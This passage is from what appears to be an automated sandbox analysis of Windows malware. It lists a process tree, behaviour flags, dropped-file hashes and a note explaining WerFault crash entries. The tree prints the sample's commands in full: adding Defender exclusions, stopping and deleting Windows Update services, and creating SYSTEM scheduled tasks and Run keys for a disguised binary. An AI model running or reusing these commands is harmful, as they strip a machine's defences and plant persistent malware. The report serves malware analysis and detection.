  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
- [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  - Suspicious behavior: EnumeratesProcesses
- [6] C:\Windows\SysWOW64\WerFault.exe | cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 312
  - Program crash
- [5] C:\Users\Admin\AppData\Local\Temp\SysApp.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
- [6] C:\Windows\SysWOW64\schtasks.exe | cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
  - Creates scheduled task(s)
- [7] C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [5] C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\SysWOW64\WerFault.exe | cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 236
  - Program crash
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [2] C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop UsoSvc
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop wuauserv
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop bits
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop dosvc
  - Launches sc.exe
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  - Modifies security service
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [2] C:\Windows\System32\dialer.exe | cmdline: C:\Windows\System32\dialer.exe
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\schtasks.exe | cmdline: "C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop UsoSvc
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop wuauserv
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop bits
  - Launches sc.exe
- [3] C:\Windows\System32\sc.exe | cmdline: sc stop dosvc
  - Launches sc.exe
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
- [3] C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Windows\System32\dialer.exe | cmdline: C:\Windows\System32\dialer.exe ovyftblehadxh
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  - Drops file in Program Files directory
- [3] C:\Windows\System32\Wbem\WMIC.exe | cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
- [2] C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  - Drops file in Program Files directory
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3364 -s 356
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\system32\svchost.exe -k LocalService -s W32Time

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3276 -s 936
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
  C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1064 -ip 1064
  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5004 -ip 5004
  C:\Windows\system32\WerFault.exe -pss -s 536 -p 3364 -ip 3364
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 532 -p 3276 -ip 3276
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 552 -p 3328 -ip 3328
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 644 -p 3456 -ip 3456
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 648 -p 1816 -ip 1816
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 632 -p 4520 -ip 4520
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 624 -p 3956 -ip 3956
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 652 -p 4168 -ip 4168
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 632 -p 4748 -ip 4748
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 660 -p 224 -ip 224
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 552 -p 1272 -ip 1272
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 648 -p 3556 -ip 3556
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 640 -p 1332 -ip 1332
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 552 -p 1312 -ip 1312
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 592 -p 2868 -ip 2868
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 564 -p 4184 -ip 4184
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 640 -p 4368 -ip 4368
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 564 -p 3408 -ip 3408
  C:\Windows\system32\WerFault.exe -pss -s 592 -p 5036 -ip 5036

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3328 -s 472
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3456 -s 420
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 1816 -s 500
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4520 -s 492
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3956 -s 500
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4168 -s 468
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4748 -s 504
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 224 -s 424
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 1272 -s 452
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3556 -s 452
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1332 -s 368
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1312 -s 428
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 2868 -s 424
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4184 -s 236
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4368 -s 488
  - Program crash

C:\Windows\system32\WerFault.exe -u -p 3408 -s 228
- Program crash

C:\Windows\system32\WerFault.exe -u -p 5036 -s 492
- Program crash

Note on the WerFault.exe entries: a faulting process launches WerFault.exe -u -p <pid> -s <event> itself (the child entries under each DllHost.exe above), and the WER service (svchost.exe -k WerSvcGroup) launches WerFault.exe -pss -s <handle> -p <pid> -ip <pid> with the faulting process assigned as its parent; the -pss helper then snapshots the faulting process, which clones it through NtCreateProcessEx. Those two steps are what the OtherParentProcess signatures react to, and they are standard Windows Error Reporting behaviour rather than parent-PID spoofing by the sample. The observation worth taking from this tree is the crash cascade itself: seventeen DllHost.exe COM surrogate instances (AppIDs {3EB3C877-1F16-487C-9050-104DBCD66683} and {F9717507-6651-4EDB-BFF7-AE615179BCCF}) fault during the run, and two further faulting processes (PIDs 3408 and 5036) are reported without their parent entries appearing in this listing.
Network

MITRE ATT&CK Matrix ATT&CK v6

Downloads
- C:\Program Files\Google\Libs\g.log
  Filesize: 226B
  MD5: fdba80d4081c28c65e32fff246dc46cb
  SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
  SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
  SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

- C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
  Filesize: 3.7MB
  MD5: e2fb72e358e13e40ae8327c3a9df8165
  SHA1: b40aceed9393e3d4c289b2cf477dd5dee76a39da
  SHA256: d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
  SHA512: b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CA4.tmp.csv
  Filesize: 38KB
  MD5: bd14293f6b4ffca0c527274d97d7360f
  SHA1: cb2bfb09701e7e7e1c71cc8ad73ca88b4768c734
  SHA256: 02adaa4b5dfc11c3bbf620e866924cad93512226c5558098979872df5e3fdf99
  SHA512: 06d006fb3f38104aae70917a32233a6a9bed6fedd85c0c1e5f6a5f45d122127bae5429267028c6a73fc6902edde8d75d087dd4558f8ee5fb6280e395b887d4aa

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D31.tmp.txt
  Filesize: 13KB
  MD5: 104619a07967f223a99cc8c25a0f7664
  SHA1: e8e33ad964c2d4cf91d1cae8b26b13dc24d981bc
  SHA256: 34b61e7d472e7aa60adb2ba780fa432492210ba42d699c7fb3781dd190cfbc47
